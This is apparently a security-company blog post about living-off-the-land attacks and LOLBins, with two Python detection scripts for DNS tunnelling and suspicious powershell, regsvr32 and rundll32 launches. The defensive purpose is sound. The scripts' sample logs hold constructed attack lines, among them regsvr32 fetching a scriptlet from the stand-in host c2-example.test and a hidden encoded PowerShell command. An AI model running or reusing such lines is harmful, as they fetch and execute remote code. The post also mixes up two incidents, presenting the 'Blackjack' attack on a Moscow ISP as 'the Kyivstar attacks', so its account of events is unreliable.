TeamWorx Takeaways: Ukrainian “Blackjack” Hackers Take Out Russian ISP

While we’d all like to think that we’re immune to insider threats, the recent “Blackjack” attack on a Moscow ISP demonstrates one tactic adversaries can use to gain initial access to a system and remain undetected. This kind of access can be granted either intentionally (indicating malicious intent) or unintentionally by, for instance, clicking on a malicious URL. In the case of the Kyivstar attacks, however, we’d like to focus on a tactic that has been used countless times in large-scale attacks – Living off the Land (LOTL).

These attacks are fileless in nature, meaning they do not require an attacker to install any code or scripts within the target system. Instead, the attacker uses tools that are already present in the environment. The use of these native tools makes LOTL attacks far more difficult to detect, especially if the target organization relies on traditional security tools that can only search for known malware scripts or files. This gap in the security toolset enables the hacker to dwell undetected in the victim’s environment for weeks, months or even years. Applied to this case, the same logic suggests that the insider may have gained access as early as May 2023 and then watched, waited and blended in with “normal traffic and activity.” Leveraged by foreign intelligence services for years, this tactic can also enable the attacker to slowly exfiltrate data over time while remaining undetected.

This type of attack also requires knowledge of defense evasion techniques specific to the type of target system—in this case, Kyivstar's communication system. Adversaries routinely abuse the Domain Name System (DNS) protocol to hide command and control channels. Detecting this requires defenders to understand the protocol at a very detailed level, or to have signatures that flag anomalous packet sizes or behaviors within it. As is often the case with other LOTL attacks (think Volt Typhoon against Guam’s critical infrastructure), time was clearly on the attacker’s side once they gained initial access.
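The DNS point above is where a defender can act without a malware signature: command-and-control traffic hidden in DNS tends to show up as unusually long, high-entropy subdomains, oversized TXT messages and repeated queries from one client to one base domain. The following script is an added example (not code from the original article or from any vendor it mentions) that runs those three heuristics over a constructed DNS query log; the log format, thresholds and the `c2-example.test` domain are all assumptions chosen for illustration.

```python
import math
from collections import Counter

# Constructed sample DNS query log (hypothetical format: ts client qname qtype msg_size).
# The c2-example.test lines are fabricated to look like data-carrying subdomains.
SAMPLE_DNS_LOG = """\
2024-01-10T09:00:01Z 10.0.0.5 www.example.com A 62
2024-01-10T09:00:02Z 10.0.0.5 mail.example.com A 64
2024-01-10T09:00:03Z 10.0.0.7 cdn.example.net A 60
2024-01-10T09:00:04Z 10.0.0.9 3f9a8c1e2b7d4e6f0a1b2c3d4e5f6a7b.8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f.t1.c2-example.test TXT 230
2024-01-10T09:00:05Z 10.0.0.9 9b8a7c6d5e4f3a2b1c0d9e8f7a6b5c4d.d3c2b1a0f9e8d7c6b5a4f3e2d1c0b9a8.t1.c2-example.test TXT 231
2024-01-10T09:00:06Z 10.0.0.9 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d.e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1b0.t1.c2-example.test TXT 229
2024-01-10T09:00:07Z 10.0.0.5 api.example.org A 60
"""


def shannon_entropy(text: str) -> float:
    """Bits per character of `text`; 0.0 for an empty or single-symbol string."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str, base_labels: int = 2):
    """Return (subdomain, base_domain). Naive split: the base domain is the last two labels."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-base_labels]), ".".join(labels[-base_labels:])


def parse_dns_log(text: str):
    """Parse the assumed log format; malformed lines are skipped rather than crashing the pipeline."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, qname, qtype, size = parts
        records.append({"ts": ts, "client": client, "qname": qname.lower(),
                        "qtype": qtype.upper(), "size": int(size)})
    return records


def score_query(rec, max_sub_len=50, entropy_threshold=3.5, max_txt_size=200):
    """Apply the three heuristics to one record; thresholds are assumptions to tune per environment."""
    sub, base = split_qname(rec["qname"])
    reasons = []
    if len(sub) > max_sub_len:
        reasons.append("long_subdomain")
    if shannon_entropy(sub.replace(".", "")) > entropy_threshold:
        reasons.append("high_entropy_subdomain")
    if rec["qtype"] == "TXT" and rec["size"] > max_txt_size:
        reasons.append("large_txt_message")
    return base, reasons


def detect_dns_anomalies(text: str):
    """Return one alert per query that trips at least one heuristic."""
    alerts = []
    for rec in parse_dns_log(text):
        base, reasons = score_query(rec)
        if reasons:
            alerts.append({**rec, "base_domain": base, "reasons": reasons})
    return alerts


def burst_summary(alerts, threshold=3):
    """Collapse alerts into (client, base_domain) pairs seen at least `threshold` times."""
    counts = Counter((a["client"], a["base_domain"]) for a in alerts)
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = detect_dns_anomalies(SAMPLE_DNS_LOG)
    for a in found:
        print(a["ts"], a["client"], a["qname"][:40] + "...", a["reasons"])
    print("bursts:", burst_summary(found))
```

A single long or random-looking name is not proof of anything (CDN and anti-spam lookups produce them too), which is why `burst_summary` only surfaces a client that repeatedly queries the same base domain; in practice the base-domain split should use a public-suffix list rather than the naive last-two-labels rule used here.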

Several notable cyberattacks have utilized LOTL techniques, which abuse living-off-the-land binaries (LOLBins), to achieve their objectives. These attacks highlight the technique’s versatility and effectiveness in bypassing security measures. Here are some prominent examples involving common operating system files:

  • Stuxnet: Although primarily known for its use of zero-day exploits, the Stuxnet worm also used standard system tools as part of its payload delivery and execution process, leveraging the trusted status of these tools to remain undetected.
  • Dridex Malware: This banking Trojan has evolved to use LOLBins in its infection process. Tools like powershell.exe have been used to download and execute the next stages of the malware.
  • TrickBot: This banking Trojan, known for its modular design, has utilized LOLBins, such as regsvr32.exe and rundll32.exe, to load malicious DLLs and evade detection.

How can countries identify hidden threats in critical infrastructure?

As previously mentioned, LOLBin attacks are extremely difficult to detect or uncover and could operate within your environment undetected for an extended period of time. These techniques are designed to counteract some of the most advanced detection tools we have at our disposal today. Common advantages of LOLBins include evasion of security measures, difficulty of detection, attack versatility and, of course, persistence. Defending against LOLBins involves a multi-layered approach, as these legitimate tools are often not flagged by the standard security measures employed within critical infrastructure companies. This starts with knowing your environment, its routine behavior and the potential threats that can target it.

Most defenses against these hidden threats center around detection. Knowing your infrastructure and its common behaviors will allow for a more comprehensive, active defense against common attack techniques like LOLBins. Employing auditing and monitoring techniques against known system baselines can help defenders identify irregularities or non-standard behavior. In addition, a Software Bill of Materials (SBOM) can help defenders better understand how their systems are being built and what they’re being built with, enabling them to baseline systems, implement defense-in-depth strategies and employ tools like Security Information and Event Management (SIEM) solutions. This approach empowers critical infrastructure organizations to understand and visualize "what right looks like."
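The LOLBin examples listed earlier (powershell.exe, regsvr32.exe, rundll32.exe) and the baselining advice above come together in one detection pattern: record which parent processes normally launch each of these binaries, then flag a launch whose parent is outside that baseline or whose command line carries a known-abuse indicator (an encoded PowerShell command, regsvr32 pointed at a URL, rundll32 loading a DLL from a user-writable path). The script below is an added example written for this article, not code from the original or from any product it names; the event format, the baseline events, the `ws01` host and the `c2-example.test` URL are constructed, and the regexes are simplified versions of the kind of rule a SIEM would carry.

```python
import ntpath
import re

# Constructed "known-good" process-creation events standing in for a vetted baseline
# (hypothetical format: ts|host|parent_image|image|command_line).
BASELINE_EVENTS = r"""
2024-01-02T08:00:00Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\backup.ps1
2024-01-02T08:00:05Z|ws01|C:\Windows\System32\msiexec.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s "C:\Program Files\App\lib.dll"
2024-01-02T08:00:09Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2024-01-02T08:00:12Z|ws01|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
"""

# Constructed events to evaluate; the first three are fabricated suspicious cases,
# the last two repeat baseline behaviour and should stay quiet.
NEW_EVENTS = r"""
2024-01-10T09:10:00Z|ws01|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc QQBBAEEA
2024-01-10T09:10:03Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /i:http://c2-example.test/r.sct x.dll
2024-01-10T09:10:07Z|ws01|C:\Windows\System32\cmd.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\Public\update.dll,Start
2024-01-10T09:10:09Z|ws01|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2024-01-10T09:10:11Z|ws01|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
"""

# Per-binary command-line indicators (simplified; real rule sets carry many more).
LOLBIN_RULES = {
    "powershell.exe": [
        ("encoded_command", re.compile(r"\s-e(c|nc|ncodedcommand)?\s", re.I)),
        ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
        ("download_cradle", re.compile(r"downloadstring|invoke-webrequest|frombase64string", re.I)),
    ],
    "regsvr32.exe": [("remote_scriptlet", re.compile(r"https?://", re.I))],
    "rundll32.exe": [("dll_from_user_writable_path",
                      re.compile(r"\\(users\\public|appdata|programdata|temp)\\", re.I))],
}


def parse_events(text: str):
    """Parse the assumed pipe-delimited format; parent/image are reduced to lower-case basenames."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # skip blank or malformed lines
        ts, host, parent, image, cmdline = parts
        events.append({"ts": ts, "host": host,
                       "parent": ntpath.basename(parent).lower(),
                       "image": ntpath.basename(image).lower(),
                       "cmdline": cmdline})
    return events


def build_baseline(text: str):
    """The baseline is simply the set of (parent, image) pairs observed during a vetted period."""
    return {(e["parent"], e["image"]) for e in parse_events(text)}


def evaluate(text: str, baseline):
    """Return an alert for every watched binary launched outside the baseline or with an indicator."""
    alerts = []
    for e in parse_events(text):
        rules = LOLBIN_RULES.get(e["image"])
        if rules is None:
            continue  # not a watched binary
        reasons = []
        if (e["parent"], e["image"]) not in baseline:
            reasons.append("unbaselined_parent:" + e["parent"])
        reasons.extend(name for name, pattern in rules if pattern.search(e["cmdline"]))
        if reasons:
            alerts.append({"ts": e["ts"], "host": e["host"], "parent": e["parent"],
                           "image": e["image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    known_good = build_baseline(BASELINE_EVENTS)
    for alert in evaluate(NEW_EVENTS, known_good):
        print(alert["ts"], alert["parent"], "->", alert["image"], alert["reasons"])
```

The baseline half is what makes this usable: a plain "alert on every regsvr32.exe" rule drowns in installer noise, whereas "regsvr32.exe launched by something other than msiexec.exe" is rare enough to investigate. The baseline should be rebuilt from a period you have reason to trust and reviewed when software is deployed, which is exactly the inventory an SBOM and change records give you.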

This complete and proactive understanding of threats that target our critical infrastructure could also be enhanced significantly by expansive partnerships between the public and private sector, across international boundaries and state lines, and across titles and authorities. It’s not easy to detect LOLBin attacks as a single organization with limited resources and expertise—but the ability to share potential threat data more quickly and leverage partnered expertise from across the globe can be invaluable as a team works to get ahead of a threat or vulnerability before it becomes an incident, or to eradicate a threat that has already infiltrated its systems.

Final thoughts and takeaways 

The threat of LOLBins lies in their legitimate appearance and versatile nature, which make them a stealthy and effective tool for attackers. Awareness and monitoring of the usage of these tools are essential in a comprehensive cybersecurity strategy. At the end of the day, defending against known and unknown threats will require shared awareness, collaboration, transparent system knowledge and auditing, monitoring and user training.
